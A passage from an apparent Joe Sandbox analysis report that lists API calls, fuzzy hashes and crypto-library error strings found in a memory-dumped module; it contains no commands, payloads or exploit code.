                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 812e7abf21b23c8397429dcb43aff3d9638ecdc6d182b07449d237fd629154fb
                                            • Instruction ID: a8bcc14ff41d8df4e3a59a9c3ca0d425f9d913e5daaca261444d2f72e9e40973
                                            • Opcode Fuzzy Hash: 812e7abf21b23c8397429dcb43aff3d9638ecdc6d182b07449d237fd629154fb
                                            • Instruction Fuzzy Hash: EB313CB0E006189FDB10DFA9CC80F9DB7BDAF99614F60858AE418EB245C771E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 97517094ea0465f067fc422106deab0fcc086e1763a0fb08c30ae253153d94c0
                                            • Instruction ID: f3bfb06301822882a88fc43fbe43798e38886f2e79d0d094cce6c69a6d41a739
                                            • Opcode Fuzzy Hash: 97517094ea0465f067fc422106deab0fcc086e1763a0fb08c30ae253153d94c0
                                            • Instruction Fuzzy Hash: 79314C74E006289FDB11DBA8CD80B5EB7FDAF89214F60858AE529E7245C771ED80CF50
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,689B25B1,?,00000000,?), ref: 689B24E6
                                            • _malloc.LIBCMT ref: 689B251B
                                            • _memset.LIBCMT ref: 689B253B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 689B2550
                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 689B255E
                                            • __freea.LIBCMT ref: 689B2568
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                            • String ID:
                                            • API String ID: 525495869-0
                                            • Opcode ID: 4e75dedc96be315bd4f8af1310ad2e014fb26b006be3ab1502d4d8312b4c30a0
                                            • Instruction ID: ac1eb47c8a2a19de28897c9eab8bd4d5fb68f457a31a1319a22aee38b32836a7
                                            • Opcode Fuzzy Hash: 4e75dedc96be315bd4f8af1310ad2e014fb26b006be3ab1502d4d8312b4c30a0
                                            • Instruction Fuzzy Hash: A1316BB160020AAFEF01CFA8DC90DAF7BADEB08368F914435F92597250E775DD608B60
                                            APIs
                                              • Part of subcall function 689669C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 68966A08
                                              • Part of subcall function 689669C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68966A15
                                              • Part of subcall function 689669C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 68966A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Destroy$Bound$Element
                                            • String ID:
                                            • API String ID: 757764206-0
                                            • Opcode ID: 669947a8d0707653b2aafcb7c52eb65b026aeff9070c0126211562aeb43d7b58
                                            • Instruction ID: 5f5fe43c192ef0f26253dd157947853e2461817ac7601d6832453f0476db786b
                                            • Opcode Fuzzy Hash: 669947a8d0707653b2aafcb7c52eb65b026aeff9070c0126211562aeb43d7b58
                                            • Instruction Fuzzy Hash: 8F312C70E006189FDB11DB68CC80B9EB7F9AF95214FA0468AE429E7241C775ED80CF50
                                            APIs
                                              • Part of subcall function 689669C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 68966A08
                                              • Part of subcall function 689669C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68966A15
                                              • Part of subcall function 689669C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 68966A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Destroy$Bound$Element
                                            • String ID:
                                            • API String ID: 757764206-0
                                            • Opcode ID: 91ff9942cdfd872bcd272a794f22b6c7c73d6ca94e5105e946899fae945a7544
                                            • Instruction ID: afa874df61e3efece595b60bd53801db68cf021df20857cf6eb7f5de17d480e8
                                            • Opcode Fuzzy Hash: 91ff9942cdfd872bcd272a794f22b6c7c73d6ca94e5105e946899fae945a7544
                                            • Instruction Fuzzy Hash: 4E312A70E006289FDB11DBA8CC80B9EB7FEAF95214FA0458AE529E7245C775ED80CF50
                                            APIs
                                              • Part of subcall function 689669C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 68966A08
                                              • Part of subcall function 689669C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68966A15
                                              • Part of subcall function 689669C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 68966A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Destroy$Bound$Element
                                            • String ID:
                                            • API String ID: 757764206-0
                                            • Opcode ID: 91ff9942cdfd872bcd272a794f22b6c7c73d6ca94e5105e946899fae945a7544
                                            • Instruction ID: e50145e85b007bb4c50e4ad38770905a482e256f775b5b09abf8bfa96f3eada6
                                            • Opcode Fuzzy Hash: 91ff9942cdfd872bcd272a794f22b6c7c73d6ca94e5105e946899fae945a7544
                                            • Instruction Fuzzy Hash: 6D313C70E006189FDB10DFA9CC80BADB7BEAF99714FA0858AE558E7245C772DD808F50
                                            APIs
                                              • Part of subcall function 689669C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 68966A08
                                              • Part of subcall function 689669C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68966A15
                                              • Part of subcall function 689669C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 68966A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Destroy$Bound$Element
                                            • String ID:
                                            • API String ID: 757764206-0
                                            • Opcode ID: 669947a8d0707653b2aafcb7c52eb65b026aeff9070c0126211562aeb43d7b58
                                            • Instruction ID: 17e98df5ed5b4b732b3f3bc9b18ceb80d6a0703eeeb4b58bdbfc6e9d7a6b537a
                                            • Opcode Fuzzy Hash: 669947a8d0707653b2aafcb7c52eb65b026aeff9070c0126211562aeb43d7b58
                                            • Instruction Fuzzy Hash: CD310A70A006189FDB10DBA9CC80B9DB7BAAF99714FA0468AE519E7241C775E9808F50
                                            APIs
                                              • Part of subcall function 68944760: __CxxThrowException@8.LIBCMT ref: 689447F9
                                            • _memmove.LIBCMT ref: 689A0907
                                            • _memmove.LIBCMT ref: 689A0936
                                            • _memmove.LIBCMT ref: 689A0959
                                            • __CxxThrowException@8.LIBCMT ref: 689A0A25
                                            Strings
                                            • PSSR_MEM: message recovery disabled, xrefs: 689A09E3
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memmove$Exception@8Throw
                                            • String ID: PSSR_MEM: message recovery disabled
                                            • API String ID: 2655171816-3051149714
                                            • Opcode ID: 01da55419cead774036bc6c9611d6ac25fb69f2a3d8afcbac1365f949986c237
                                            • Instruction ID: 95c1d7ca65b210a3a2367c220dda3cb2f8b8e485d77bd67c043a9a6406aecd09
                                            • Opcode Fuzzy Hash: 01da55419cead774036bc6c9611d6ac25fb69f2a3d8afcbac1365f949986c237
                                            • Instruction Fuzzy Hash: 5DC14575608341DFD754CF28C880B6ABBE9BFD9304F448A5CE5998B385DB31E905CBA2
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 689A80EA
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: Max$Min$RandomNumberType$invalid bit length
                                            • API String ID: 3718517217-2498579642
                                            • Opcode ID: 6a3f00fa02ebea63465af2cbe8f3722e3c52850a7214cd54a3dd0147052f1d20
                                            • Instruction ID: 0c685b6375f5bc8e5de7e22c0750242431281c0511851759697c47953465d584
                                            • Opcode Fuzzy Hash: 6a3f00fa02ebea63465af2cbe8f3722e3c52850a7214cd54a3dd0147052f1d20
                                            • Instruction Fuzzy Hash: CEC1A0746497809EE328CB28C850BAFB7D5BFE9304F884A2CE59993391DB74D905C763
                                            APIs
                                            • __CreateFrameInfo.LIBCMT ref: 689ABEB6
                                              • Part of subcall function 689AAB70: __getptd.LIBCMT ref: 689AAB7E
                                              • Part of subcall function 689AAB70: __getptd.LIBCMT ref: 689AAB8C
                                            • __getptd.LIBCMT ref: 689ABEC0
                                              • Part of subcall function 689AEAE6: __getptd_noexit.LIBCMT ref: 689AEAE9
                                              • Part of subcall function 689AEAE6: __amsg_exit.LIBCMT ref: 689AEAF6
                                            • __getptd.LIBCMT ref: 689ABECE
                                            • __getptd.LIBCMT ref: 689ABEDC
                                            • __getptd.LIBCMT ref: 689ABEE7
                                            • _CallCatchBlock2.LIBCMT ref: 689ABF0D
                                              • Part of subcall function 689AAC15: __CallSettingFrame@12.LIBCMT ref: 689AAC61
                                              • Part of subcall function 689ABFB4: __getptd.LIBCMT ref: 689ABFC3
                                              • Part of subcall function 689ABFB4: __getptd.LIBCMT ref: 689ABFD1
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                            • String ID:
                                            • API String ID: 1602911419-0
                                            • Opcode ID: e45fa3919a5fd98d723d57d3500287a1465e54695f4a6e75ad45692ade52f4d6
                                            • Instruction ID: 78d276694aa787533a1e858335f8b3a3dc4925ab01ce72a60ad26fcc59996f52
                                            • Opcode Fuzzy Hash: e45fa3919a5fd98d723d57d3500287a1465e54695f4a6e75ad45692ade52f4d6
                                            • Instruction Fuzzy Hash: 4C11C3B5C012099FDB10DFA4C944AAEBBB0FF58318F548469F814A7250EB399A559F50
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 68977267
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw
                                            • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                                            • API String ID: 2005118841-1273958906
                                            • Opcode ID: 89b0399dde23d0491cfecc13e22169add14c55f5357f47518ecc322cc81f0f51
                                            • Instruction ID: a8a3279a07ce3573255eb14f44c544e19500a50ceea7905ae744e535218131a7
                                            • Opcode Fuzzy Hash: 89b0399dde23d0491cfecc13e22169add14c55f5357f47518ecc322cc81f0f51
                                            • Instruction Fuzzy Hash: E56162752083809FD331DB68C884FEFB7E8AFA9348F404A1DE59987241DB75D9058BA7
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _strncmptype_info::operator!=
                                            • String ID: ThisPointer:$ValueNames
                                            • API String ID: 1333309372-2375088429
                                            • Opcode ID: 59e47a92a2ef6f268427e9945a158c264ef9be7e89ab23eca3a4bc91ef62df78
                                            • Instruction ID: 9102422db5831096ce8b0842025b3b27d9464ea24f1aa6b50461ac47aeff851c
                                            • Opcode Fuzzy Hash: 59e47a92a2ef6f268427e9945a158c264ef9be7e89ab23eca3a4bc91ef62df78
                                            • Instruction Fuzzy Hash: 975136756087409FCB10CF64C884A2BB7FEAF9630CF884A5DF4E697241C767E8098752
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _strncmptype_info::operator!=
                                            • String ID: ThisPointer:$ValueNames
                                            • API String ID: 1333309372-2375088429
                                            • Opcode ID: 3b634758f0966af0e70e11fc79744c80d4bc2fcfa4ddb68e88bf60342d6b9cdd
